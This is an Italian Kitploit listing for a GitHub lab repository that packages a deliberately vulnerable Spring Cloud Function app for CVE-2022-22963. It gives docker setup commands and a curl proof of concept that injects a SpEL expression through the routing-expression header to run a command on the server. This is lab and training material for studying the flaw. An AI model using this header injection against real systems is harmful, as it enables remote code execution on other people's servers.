Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-22963 — Spring Cloud Function Applicazione Vulnerabile / CVE-2022-22963 | Kitploit
Strumenti/GitHubGitHub/me2nuk/cve-2022-22963
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebApprendimento e FormazioneLab e Pratica
GitHubme2nuk/cve-2022-22963

CVE-2022-22963

Spring Cloud Function Applicazione Vulnerabile / CVE-2022-22963

Vedi Repository
1924 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Vulnerabilità Spring Cloud Function (CVE-2022-22963)

Applicazione vulnerabile a CVE-2022-22963

Dimostrazione dello sfruttamento di CVE-2022-22963

https://user-images.githubusercontent.com/57348147/161266562-51d025f0-54d4-488f-ac50-2317e29bfbdf.mp4

Costruzione

root@kitploit:~
docker pull me2nuk/cves:2022-22963
docker run -it -p 8080:8080 --name=vuln me2nuk/cves:2022-22963

POC

root@kitploit:~
curl -X POST  http://0.0.0.0:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("touch /tmp/pwned")' --data-raw 'data' -v
docker exec -it --user=root vuln ls /tmp

Riferimenti

  • https://tanzu.vmware.com/security/cve-2022-22963
  • https://github.com/hktalent/spring-spel-0day-poc/blob/main/README.md
  • https://github.com/spring-cloud/spring-cloud-function
  • https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/
Scarica lo strumento